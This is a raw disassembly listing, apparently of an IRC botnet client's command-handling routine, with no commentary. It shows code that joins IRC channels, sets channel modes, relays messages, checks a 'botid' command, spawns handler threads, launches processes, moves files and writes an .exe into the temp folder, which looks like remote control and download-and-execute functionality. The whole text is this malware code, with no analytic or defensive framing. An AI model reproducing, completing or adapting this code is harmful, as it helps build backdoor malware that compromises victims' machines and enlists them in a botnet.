push [ebp+arg_8]
add esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417880
add esp, 14h
mov esi, eax
lea eax, [ebp+var_2DC]
push esi
push offset dword_4315BC
push eax
call sub_4172B0
add esp, 0Ch
cmp esi, ebx
jz loc_414F47
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push [ebp+arg_18]
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D679
push edi
call sub_41781F
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_4405F0[eax], 73h
jnz loc_414F47
push esi
push edi
call sub_41781F
imul eax, 234h
pop ecx
add eax, offset byte_440808
push eax
push [ebp+arg_18]
push offset aSSS_1 ; "[%s] * %s %s"
loc_4122A7: ; CODE XREF: sub_40EE72+3532�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 28h
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_4122D4: ; CODE XREF: sub_40EE72+276C�j
; sub_40EE72+2783�j
push edi
call sub_41781F
imul eax, 234h
pop ecx
cmp ds:byte_440808[eax], bl
jz loc_414F47
cmp [ebp+var_C], ebx
jz loc_414F47
push [ebp+arg_18]
call sub_417AB0
push edi
mov esi, eax
call sub_417AB0
push [ebp+arg_8]
add esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_0]
lea eax, [eax+esi+2]
push eax
call sub_417880
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_414F47
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
push ebx
push ebx
push esi
push [ebp+arg_18]
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D679
push edi
call sub_41781F
imul eax, 234h
add esp, 18h
cmp byte ptr ds:dword_4405F0[eax], 73h
jnz loc_414F47
push esi
push edi
call sub_41781F
imul eax, 234h
pop ecx
add eax, offset byte_440808
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
jmp loc_4122A7
; ---------------------------------------------------------------------------
loc_4123A9: ; CODE XREF: sub_40EE72+273E�j
; sub_40EE72+2755�j
push edi
call ds:dword_43ADD8 ;; inet_addr
push [ebp+arg_18]
mov [ebp+var_474], eax
call sub_41781F
push [ebp+arg_0]
mov [ebp+var_480], eax
call sub_41781F
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_47C], eax
lea eax, [ebp+var_500]
mov [ebp+var_504], esi
push eax
call sub_418C10
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_46C], edi
push [ebp+var_47C]
mov [ebp+var_468], eax
push [ebp+var_480]
push [ebp+var_474]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_2DC]
push offset unk_431550
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_478], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_504]
push ebx
push eax
push offset sub_415E37
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_478]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_41248B
loc_412475: ; CODE XREF: sub_40EE72+3617�j
cmp [ebp+var_464], ebx
jnz loc_4144E5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_412475
; ---------------------------------------------------------------------------
loc_41248B: ; CODE XREF: sub_40EE72+3601�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_431504
jmp loc_4144D6
; ---------------------------------------------------------------------------
loc_41249C: ; CODE XREF: sub_40EE72+2710�j
; sub_40EE72+2727�j
push edi
call sub_41781F
push 7Fh
mov [ebp+var_314], eax
push [ebp+arg_18]
lea eax, [ebp+var_418]
push eax
call sub_418C10
push [ebp+arg_0]
call sub_41781F
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_318], eax
lea eax, [ebp+var_398]
push [ebp+var_8C]
mov [ebp+var_420], esi
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_304], eax
push [ebp+var_318]
lea eax, [ebp+var_418]
mov [ebp+var_308], edi
push eax
push [ebp+var_314]
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_4314B8
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 10h
push eax
call sub_416D5C
add esp, 24h
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_420]
push ebx
push eax
push offset sub_407BDE
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_412588
loc_412572: ; CODE XREF: sub_40EE72+3714�j
cmp [ebp+var_300], ebx
jnz loc_4144E5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_412572
; ---------------------------------------------------------------------------
loc_412588: ; CODE XREF: sub_40EE72+36FE�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_431464
jmp loc_4144D6
; ---------------------------------------------------------------------------
loc_412599: ; CODE XREF: sub_40EE72+26E2�j
; sub_40EE72+26F9�j
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_418C10
push 0FFh
lea eax, [ebp+var_680]
push [ebp+arg_18]
push eax
call sub_418C10
push [ebp+arg_0]
mov [ebp+var_57C], ebx
call sub_41781F
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_84]
add esp, 1Ch
cmp eax, ebx
jz short loc_4125F5
push 10h
push ebx
push eax
call sub_418A3B
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_4125FB
; ---------------------------------------------------------------------------
loc_4125F5: ; CODE XREF: sub_40EE72+376D�j
mov [ebp+var_570], ebx
loc_4125FB: ; CODE XREF: sub_40EE72+3781�j
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz short loc_412612
push esi
call sub_41781F
pop ecx
mov [ebp+var_574], eax
jmp short loc_412618
; ---------------------------------------------------------------------------
loc_412612: ; CODE XREF: sub_40EE72+378F�j
mov [ebp+var_574], ebx
loc_412618: ; CODE XREF: sub_40EE72+379E�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_568], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_431428
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_2DC]
push 16h
push eax
call sub_416D5C
add esp, 1Ch
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40CAF1
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4126C9
loc_4126B3: ; CODE XREF: sub_40EE72+3855�j
cmp [ebp+var_560], ebx
jnz loc_411D22
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4126B3
; ---------------------------------------------------------------------------
loc_4126C9: ; CODE XREF: sub_40EE72+383F�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4313D8
jmp loc_4128CC
; ---------------------------------------------------------------------------
loc_4126DA: ; CODE XREF: sub_40EE72+26B4�j
; sub_40EE72+26CB�j
push 7Fh
lea eax, [ebp+var_76C]
pop esi
push esi
push edi
push eax
call sub_418C10
push esi
lea eax, [ebp+var_6EC]
push [ebp+arg_18]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_66C]
push [ebp+arg_0]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_418C10
mov eax, [ebp+var_8]
add esp, 30h
mov esi, [ebp+var_4]
mov [ebp+var_564], eax
push [ebp+arg_0]
mov eax, [ebp+arg_4]
mov [ebp+var_770], eax
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
mov [ebp+var_568], esi
push edi
push offset dword_43139C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 0Bh
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_770]
push ebx
push eax
push offset sub_4019D7
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4127AD
loc_41279B: ; CODE XREF: sub_40EE72+3939�j
cmp [ebp+var_560], ebx
jnz short loc_4127C8
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_41279B
; ---------------------------------------------------------------------------
loc_4127AD: ; CODE XREF: sub_40EE72+3927�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2DC]
push offset dword_431354
push eax
call sub_4172B0
add esp, 0Ch
loc_4127C8: ; CODE XREF: sub_40EE72+392F�j
cmp [ebp+var_8], ebx
jnz loc_414E11
push ebx
push esi
jmp loc_414619
; ---------------------------------------------------------------------------
loc_4127D8: ; CODE XREF: sub_40EE72+266F�j
; sub_40EE72+2686�j ...
push 7Fh
lea eax, [ebp+var_7E8]
pop esi
push esi
push edi
push eax
call sub_418C10
push esi
lea eax, [ebp+var_768]
push [ebp+arg_18]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_6E8]
push [ebp+arg_0]
push eax
call sub_418C10
push esi
lea eax, [ebp+var_668]
push [ebp+var_8C]
push eax
call sub_418C10
push 20h
lea eax, [ebp+var_5E8]
push [ebp+arg_8]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_568], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
mov [ebp+var_7F0], esi
push edi
push offset unk_431314
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 0Ah
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_7EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F0]
push ebx
push eax
push offset sub_401000
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_7EC]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4128C0
loc_4128AA: ; CODE XREF: sub_40EE72+3A4C�j
cmp [ebp+var_560], ebx
jnz loc_411D22
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4128AA
; ---------------------------------------------------------------------------
loc_4128C0: ; CODE XREF: sub_40EE72+3A36�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4312CC
loc_4128CC: ; CODE XREF: sub_40EE72+2E92�j
; sub_40EE72+2FEE�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
jmp loc_411D1F
; ---------------------------------------------------------------------------
loc_4128DD: ; CODE XREF: sub_40EE72+2641�j
; sub_40EE72+2658�j
push 7Fh
lea eax, [ebp+var_458]
push edi
push eax
call sub_418C10
push [ebp+arg_18]
call sub_41781F
push 3Fh
mov [ebp+var_308], eax
push [ebp+arg_0]
lea eax, [ebp+var_3D8]
push eax
call sub_418C10
mov esi, [ebp+esi+var_84]
add esp, 1Ch
cmp esi, ebx
jz short loc_41292B
push 3Fh
lea eax, [ebp+var_398]
push esi
push eax
call sub_418C10
add esp, 0Ch
loc_41292B: ; CODE XREF: sub_40EE72+3AA5�j
lea eax, [ebp+var_3D8]
mov [ebp+var_304], 1
push eax
lea eax, [ebp+var_458]
push [ebp+var_308]
push eax
lea eax, [ebp+var_2DC]
push offset unk_43128C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 18h
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push offset sub_40EB92
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4129B7
loc_4129A1: ; CODE XREF: sub_40EE72+3B43�j
cmp [ebp+var_2FC], ebx
jnz loc_413A62
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4129A1
; ---------------------------------------------------------------------------
loc_4129B7: ; CODE XREF: sub_40EE72+3B2D�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_431244
jmp loc_411888
; ---------------------------------------------------------------------------
loc_4129C8: ; CODE XREF: sub_40EE72+2601�j
; sub_40EE72+2618�j
push [ebp+arg_18]
call sub_41781F
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_412ABF
mov esi, 80h
push edi
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_41782A
add esp, 0Ch
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41782A
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_564], eax
lea eax, [ebp+var_2DC]
push edi
push offset unk_431208
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 0Dh
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_40144A
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_412AAE
loc_412A98: ; CODE XREF: sub_40EE72+3C3A�j
cmp [ebp+var_560], ebx
jnz loc_41460C
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_412A98
; ---------------------------------------------------------------------------
loc_412AAE: ; CODE XREF: sub_40EE72+3C24�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4311C0
jmp loc_413BFD
; ---------------------------------------------------------------------------
loc_412ABF: ; CODE XREF: sub_40EE72+3B67�j
push offset unk_431178
jmp loc_4145FE
; ---------------------------------------------------------------------------
loc_412AC9: ; CODE XREF: sub_40EE72+25D3�j
; sub_40EE72+25EA�j
push [ebp+arg_18]
push edi
call ds:dword_42416C ;; MoveFileA
test eax, eax
jz short loc_412AF9
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push edi
push offset unk_431144
push 200h
push eax
call sub_41782A
add esp, 14h
jmp loc_41460C
; ---------------------------------------------------------------------------
loc_412AF9: ; CODE XREF: sub_40EE72+3C63�j
push offset dword_431128
call sub_40AA35
pop ecx
push eax
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
jmp loc_413C09
; ---------------------------------------------------------------------------
loc_412B1B: ; CODE XREF: sub_40EE72+25A5�j
; sub_40EE72+25BC�j
push edi
lea eax, [ebp+var_774]
push 104h
push eax
call sub_41782A
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_412B55
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_412B55
push eax
lea eax, [ebp+var_670]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_412B55: ; CODE XREF: sub_40EE72+3CC1�j
; sub_40EE72+3CD2�j
push [ebp+var_8C]
lea eax, [ebp+var_7F4]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_7F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_670]
push eax
lea eax, [ebp+var_774]
push eax
push offset unk_4310E8
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 1Ch
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_7F8]
push ebx
push eax
push offset sub_408DCA
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_412C0B
loc_412BF5: ; CODE XREF: sub_40EE72+3D97�j
cmp [ebp+var_560], ebx
jnz loc_414E11
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_412BF5
; ---------------------------------------------------------------------------
loc_412C0B: ; CODE XREF: sub_40EE72+3D81�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_43109C
jmp loc_414E02
; ---------------------------------------------------------------------------
loc_412C1C: ; CODE XREF: sub_40EE72+2577�j
; sub_40EE72+258E�j
push 44h
lea eax, [ebp+var_4A0]
pop esi
push esi
push ebx
push eax
call sub_417330
push 1
mov [ebp+var_4A0], esi
pop esi
mov word ptr [ebp+var_470], bx
push edi
mov [ebp+var_474], esi
call sub_41781F
add esp, 10h
cmp eax, esi
jnz short loc_412C59
mov word ptr [ebp+var_470], 5
loc_412C59: ; CODE XREF: sub_40EE72+3DDC�j
cmp [ebp+var_C], ebx
jz loc_413A62
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz loc_413A62
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_4A0]
push eax
push ebx
push ebx
push 28h
push esi
push ebx
push ebx
push edi
push ebx
call ds:dword_424120 ;; CreateProcessA
test eax, eax
jnz short loc_412CA4
push offset unk_431068
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_412CA4: ; CODE XREF: sub_40EE72+3E26�j
push edi
push offset dword_431040
jmp loc_411888
; ---------------------------------------------------------------------------
loc_412CAF: ; CODE XREF: sub_40EE72+2549�j
; sub_40EE72+2560�j
push [ebp+arg_18]
push offset aBotid ; "botid"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_412E29
lea eax, [ebp+var_3FC]
push eax
push 104h
call ds:dword_42412C ;; GetTempPathA
push 0FFh
lea eax, [ebp+var_780]
push edi
push eax
call sub_418C10
lea eax, [ebp+var_2F8]
push eax
call sub_4159F4
add esp, 10h
push eax
lea eax, [ebp+var_3FC]
push eax
lea eax, [ebp+var_680]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_4172B0
mov eax, [ebp+esi+var_88]
add esp, 10h
cmp eax, ebx
mov [ebp+var_57C], 1
mov [ebp+var_578], ebx
jz short loc_412D44
push 10h
push ebx
push eax
call sub_418A3B
add esp, 0Ch
mov [ebp+var_570], eax
jmp short loc_412D4A
; ---------------------------------------------------------------------------
loc_412D44: ; CODE XREF: sub_40EE72+3EBC�j
mov [ebp+var_570], ebx
loc_412D4A: ; CODE XREF: sub_40EE72+3ED0�j
mov esi, [ebp+esi+var_84]
cmp esi, ebx
jz short loc_412D64
push esi
call sub_41781F
pop ecx
mov [ebp+var_574], eax
jmp short loc_412D6A
; ---------------------------------------------------------------------------
loc_412D64: ; CODE XREF: sub_40EE72+3EE1�j
mov [ebp+var_574], ebx
loc_412D6A: ; CODE XREF: sub_40EE72+3EF0�j
movzx eax, [ebp+var_9C3]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_8C]
mov [ebp+var_56C], eax
lea eax, [ebp+var_800]
mov [ebp+var_804], esi
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
push edi
lea eax, [ebp+var_2DC]
push offset unk_430FF8
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_2DC]
push 17h
push eax
call sub_416D5C
add esp, 18h
mov [ebp+var_580], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_804]
push ebx
push eax
push offset sub_40CAF1
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_580]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_412E18
loc_412E02: ; CODE XREF: sub_40EE72+3FA4�j
cmp [ebp+var_560], ebx
jnz loc_413A62
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_412E02
; ---------------------------------------------------------------------------
loc_412E18: ; CODE XREF: sub_40EE72+3F8E�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_430FAC
jmp loc_411888
; ---------------------------------------------------------------------------
loc_412E29: ; CODE XREF: sub_40EE72+3E4E�j
push offset unk_430F58
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_412E33: ; CODE XREF: sub_40EE72+251B�j
; sub_40EE72+2532�j
push [ebp+var_90]
push offset dword_432D74
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F239
cmp [ebp+var_C], ebx
jz loc_40F239
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
pop ecx
pop ecx
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_430F48
push eax
call sub_4172B0
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_418C10
push edi
call sub_41781F
add esp, 28h
test eax, eax
jle short loc_412EBC
push edi
call sub_41781F
imul eax, 3E8h
pop ecx
push eax
call ds:dword_424064 ;; Sleep
loc_412EBC: ; CODE XREF: sub_40EE72+4034�j
push offset dword_430F24
call sub_40BF6D
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_412ED0: ; CODE XREF: sub_40EE72+24ED�j
; sub_40EE72+2504�j
push [ebp+var_90]
push offset dword_432D74
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F239
cmp [ebp+var_C], ebx
jz loc_414F47
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov esi, eax
mov eax, [ebp+arg_18]
inc eax
push offset aRepeat ; "repeat"
push eax
call sub_4176D0
add esp, 10h
test eax, eax
push esi
jz short loc_412F8F
push [ebp+var_8C]
lea eax, [ebp+var_2DC]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_430F48
push eax
call sub_4172B0
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_418C10
loc_412F4E: ; DATA XREF: _2:off_42DE40�o
add esp, 24h
lea eax, [ebp+var_2DC]
push esi
push offset dword_430EF4
push eax
call sub_4172B0
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
push edi
call sub_41781F
add esp, 14h
test eax, eax
jle loc_414F47
push edi
call sub_41781F
add eax, [ebp+arg_24]
pop ecx
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_412F8F: ; CODE XREF: sub_40EE72+40A3�j
push offset dword_430EB0
jmp loc_411888
; ---------------------------------------------------------------------------
loc_412F99: ; CODE XREF: sub_40EE72+24BF�j
; sub_40EE72+24D6�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_430EA8
push eax
call sub_4172B0
push edi
call sub_41781F
add esp, 10h
loc_412FB6: ; CODE XREF: sub_40EE72+41AE�j
test eax, eax
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
loc_412FD0: ; CODE XREF: sub_40EE72+4CBB�j
lea eax, [ebp+var_2DC]
push eax
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D633
loc_412FF4: ; CODE XREF: sub_40EE72+4469�j
; sub_40EE72+5D44�j
add esp, 0Ch
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_412FFC: ; CODE XREF: sub_40EE72+2491�j
; sub_40EE72+24A8�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2DC]
push [ebp+arg_18]
push offset dword_430E9C
push eax
call sub_4172B0
push edi
call sub_41781F
add esp, 14h
jmp short loc_412FB6
; ---------------------------------------------------------------------------
loc_413022: ; CODE XREF: sub_40EE72+2463�j
; sub_40EE72+247A�j
push [ebp+arg_18]
lea eax, [ebp+var_2DC]
push offset dword_430E94
push eax
call sub_4172B0
push edi
call sub_41781F
add esp, 10h
test eax, eax
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
lea eax, [ebp+var_2DC]
push eax
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D633
add esp, 0Ch
push [ebp+arg_18]
push edi
push offset dword_430E68
jmp loc_4132D6
; ---------------------------------------------------------------------------
loc_41308E: ; CODE XREF: sub_40EE72+2435�j
; sub_40EE72+244C�j
cmp [ebp+var_C], ebx
jz loc_414F47
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4130BF
push esi
lea eax, [ebp+var_2DC]
push offset dword_430E60
push eax
call sub_4172B0
add esp, 0Ch
loc_4130BF: ; CODE XREF: sub_40EE72+4236�j
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
lea eax, [ebp+var_2DC]
push eax
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D633
add esp, 0Ch
push esi
push edi
push offset dword_430E34
jmp loc_4132D6
; ---------------------------------------------------------------------------
loc_413113: ; CODE XREF: sub_40EE72+2407�j
; sub_40EE72+241E�j
cmp [ebp+var_C], ebx
jz loc_414F47
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F47
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
push esi
push offset dword_428598
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D633
add esp, 0Ch
push esi
push edi
push offset dword_430E08
jmp loc_4132D6
; ---------------------------------------------------------------------------
loc_413181: ; CODE XREF: sub_40EE72+23D9�j
; sub_40EE72+23F0�j
cmp [ebp+var_C], ebx
jz loc_414F47
push edi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F47
push esi
push offset aModeS ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push esi
push offset dword_430DD0
jmp loc_414F40
; ---------------------------------------------------------------------------
loc_4131BB: ; CODE XREF: sub_40EE72+23AB�j
; sub_40EE72+23C2�j
push [ebp+var_90]
push offset dword_432D74
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_40F239
push [ebp+arg_18]
push offset dword_430DC4
push [ebp+arg_4]
call sub_40D633
push edi
call sub_41781F
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_424064 ;; Sleep
push [ebp+esi+var_88]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
push offset dword_430DA0
call sub_40BF6D
add esp, 14h
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_413224: ; CODE XREF: sub_40EE72+237D�j
; sub_40EE72+2394�j
cmp [ebp+var_C], ebx
jz loc_414F47
push edi
call sub_417AB0
push [ebp+arg_8]
mov esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417880
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_414F47
push esi
lea eax, [ebp+var_2DC]
push offset dword_4315BC
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_40D679
add esp, 20h
push esi
push edi
push offset dword_430D74
jmp short loc_4132D6
; ---------------------------------------------------------------------------
loc_41328A: ; CODE XREF: sub_40EE72+234F�j
; sub_40EE72+2366�j
cmp [ebp+var_C], ebx
jz loc_414F47
push edi
call sub_417AB0
push [ebp+arg_8]
mov esi, eax
call sub_417AB0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_417880
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_414F47
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_40D679
add esp, 14h
push esi
push edi
push offset dword_430D48
loc_4132D6: ; CODE XREF: sub_40EE72+4217�j
; sub_40EE72+429C�j ...
call sub_40BFE1
jmp loc_412FF4
; ---------------------------------------------------------------------------
loc_4132E0: ; CODE XREF: sub_40EE72+2321�j
; sub_40EE72+2338�j
cmp [ebp+var_C], ebx
jz loc_40F239
push [ebp+arg_18]
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz loc_40F239
push eax
push edi
call sub_40BE75
pop ecx
pop ecx
push edi
